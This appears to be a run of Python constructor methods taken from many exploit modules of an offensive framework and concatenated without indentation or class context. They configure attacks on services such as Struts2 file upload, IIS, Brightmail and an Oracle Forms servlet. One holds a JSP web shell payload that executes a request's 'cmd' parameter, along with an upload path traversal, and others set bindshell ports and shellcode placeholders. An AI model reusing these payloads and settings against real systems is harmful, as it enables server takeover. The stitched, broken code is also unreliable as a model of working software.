def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.name = NAME
self.setInfo(DESCRIPTION)
self.version = 0
self.sleeptime = 4
self.computername = ""
self.port = 6504
# msrpc stuff
self.response = 1
self.forceauth = 0
self.UUID = u'506b1890-14c8-11d1-bbc3-00805fa6962e'
self.uuidversion = u'1.0'
self.targetfunction = 0x156
self.getcontexthandle = None
self.object = ""
#??
self.listen_port=5555
# CommandExploit params
self.max_command_length=60
self.capabilities=["tftp"]
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.autoFind = False
self.host = ""
self.port = 5984
self.badstring = "\x00"
self.version = 1
self.done = 0
self.name = NAME
self.basepath = "/"
self.hostname = ""
self.ssl = False
self.only_test = False
self.discover = False
self.vhost = ''
self.vulnerable = []
self.basicauth_user = ""
self.basicauth_password = ""
self.auth = None
self.protocol = "http"
self.arg_node_address = ""
# self.setVersions()
self.supports_universal = True #for CommandExploits that support Universal MOSDEF (which you should!)
self.data = None
self.cookie = None
self.daemons = []
self.node_prefix = ""
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.name = NAME
self.path = os.path.dirname(__file__)
self.mosdef_type = "PHP"
self.payloadType = 0
self.host = ""
self.hostname = ''
self.port = 80
self.https = False
self.hostname = None
self.path = ''
self.ua = None
self.node_id = 1
self.failed_attempts = 0
self.basicauth_user = ""
self.basicauth_password = ""
# CommandExploit
self.supports_universal = True
def __init__(self):
CommandExploit.__init__(self)
tcpexploit.__init__(self)
self.name = NAME
self.host = None
self.port = 2810
self.supports_universal = True
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.use_local_interface = False
self.clientversion = None
self.filename = None
self.version = 1
self.autoFind = False
def __init__(self):
CommandExploit.__init__(self)
tcpexploit.__init__(self)
self.name = NAME
self.host = None
self.port = 8080
self.path = "struts2-showcase/fileupload/upload.action"
self.supports_universal = True
self.UA = spkproxy.UserAgent("")
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.port = 80
self.ssl = 0
self.done = 0
self.version = 0
self.name = NAME
self.vhost = ''
self.basepath = "/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2"
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.neededListenerTypes=self.cle_neededListenerTypes
self.port=80
self.host=""
self.shellcode="\xcc" * 298
self.badstring="\x00"
self.setVersions()
self.version=1
self.done=0
self.name=NAME
self.basepath="/"
self.command=None #none by default. We want to try to automatically load MOSDEF
return
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.port = 80
self.host = ""
#characters IIS hates us to use
self.badstring = ",><"
self.setVersions()
self.version = 1
self.done = 0
self.name = NAME
self.basepath = "/scripts/"
self.command = None #none by default. We want to try to automatically load MOSDEF
self.docmdcpy = True
return
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.host = ""
self.port = 443
self.version = 1
self.name = NAME
self.hostname = ""
self.vhost = ""
self.vhosts = None
self.vulnerable_targets = None
self.protocol = "https"
self.basepath = "/brightmail"
self.ssl = True
self.cookies = ""
self.extraheaders = ""
self.discover = False
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.name = NAME
self.host = "127.0.0.1"
self.port = 443
self.pre_check = True
self.hostname = None
self.respath = os.path.abspath(
os.path.join(os.path.dirname(__file__), "Resources/"))
self.http_ssl = True
self.base_url = ""
self.type = "BACK"
self.use_bindshell = False
self.bindshell_port = 5555
self.ua = None
return
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.port = 8889
self.host = ""
self.version = 0
self.done = 0
self.ssl = ""
self.name = NAME
self.respath = os.path.abspath(
os.path.join(os.path.dirname(__file__), "Resources/"))
self.mosdef_type = "UNIVERSAL"
self.mosdef_debug = False
self.http_ssl = False
self.supports_universal = True
# self.command = None
self.basicauth_user = ""
self.basicauth_password = ""
self.hostname = None
self.content_type = ""
self.target_params = "ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1,"
self.base_url = ""
self.basepath = "/forms/lservlet"
self.ua = None
self.upload_path = "/forms/java/"
self.fixed_upload_path = "../../"
self.cmd_name = randomstring(8) + ".jsp"
# Name of blind shell with random string appended to avoid multiple executions of the same run.
self.blind_webshell = '<%25java.lang.Runtime.getRuntime().exec(request.getParameter("cmd").split(","))%3b%25>{}.jsp'.format(
randomstring(4))
self.final_path = ""
self.endpoint_up = "is up and running"
return
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.name = NAME
self.path = os.path.dirname(__file__)
self.payloadType = 0
self.host = ""
self.hostname = ''
self.port = 80
self.https = False
self.path = ''
self.ua = None
self.blind = False
self.basicauth_user = ''
self.basicauth_password = ''
# CommandExploit
self.supports_universal = True
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.host = ""
self.port = 3000
self.version = 1
self.name = NAME
self.hostname = ""
self.vhost = ""
self.vhosts = None
self.vulnerable_targets = None
self.protocol = "http"
self.basepath = "/"
self.ssl = False
self.cookies = ""
self.extraheaders = ""
self.discover = False
self.setVersions()
self.supports_universal = True #for CommandExploits that support Universal MOSDEF (which you should!)
